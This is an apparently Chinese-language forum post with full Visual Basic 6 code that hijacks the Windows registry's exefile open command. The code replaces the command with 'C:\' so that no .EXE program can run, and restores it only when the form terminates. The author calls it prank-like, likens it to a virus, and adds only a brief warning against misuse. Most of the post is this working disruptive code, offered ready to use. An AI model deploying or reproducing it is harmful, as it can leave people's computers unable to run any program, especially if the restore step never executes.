|
這是我在VBQA中所看到的問題,要求有些奇怪,感覺有些像惡作劇程式,不過我還是把方法寫出來,不曉得各位有沒有中過聖誕及病毒的經驗,會使的所有執行檔都不能執行,但他所做的只是修改登錄檔這樣的小動作而已,Windows真的很脆弱,他是將HKEY_CLASSES_ROOT\exefile\shell\open\command的預設值改掉,原來是"%1" %*只要將他改成其他不相關的東西即可,如C:\等等的字串,那麼所有的.EXE檔就不能執行了,若要更徹底一點可以連HKEY_CLASSES_ROOT\comfile\shell\open\command也一起改,不過程式執行完記的要將這個改回來,不然這台電腦以後什麼都不能執行了 程式如下
Option Explicit
Private Declare Function RegOpenKey Lib "advapi32.dll" _
Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal _
lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" _
(ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, _
ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Private Declare Function RegQueryValueEx Lib _
"advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, _
ByVal lpValueName As String, _
ByVal lpReserved As Long, _
lpType As Long, lpData As Any, _
lpcbData As Long) As Long
Private Declare Function RegCloseKey Lib _
"advapi32.dll" (ByVal hKey As Long) As Long
Private Const REG_SZ = 1
Private Const ERROR_SUCCESS = 0&
Private Const HKEY_CLASSES_ROOT = &H80000000
Dim sOrg As String
Private Sub Form_Load()
Dim hKey As Long, r As Long, lData As Long, DataType As Long
Dim sGar As String
sGar = "C:\"
If RegOpenKey(HKEY_CLASSES_ROOT, "exefile\shell\open\command", hKey) = ERROR_SUCCESS Then
r = RegQueryValueEx(hKey, "", ByVal 0, DataType, ByVal vbNullString, lData)
sOrg = Space(lData)
RegQueryValueEx hKey, "", ByVal 0, DataType, ByVal sOrg, lData
End If
RegSetValueEx hKey, "", 0, REG_SZ, ByVal sGar, Len(sGar)
RegCloseKey hKey
End Sub
Private Sub Form_Terminate()
Dim hKey As Long
If RegOpenKey(HKEY_CLASSES_ROOT, "exefile\shell\open\command", hKey) = ERROR_SUCCESS Then
RegSetValueEx hKey, "", 0, REG_SZ, ByVal sOrg, Len(sOrg)
End If
RegCloseKey hKey
End Sub
不過可別拿來害人呀。 |
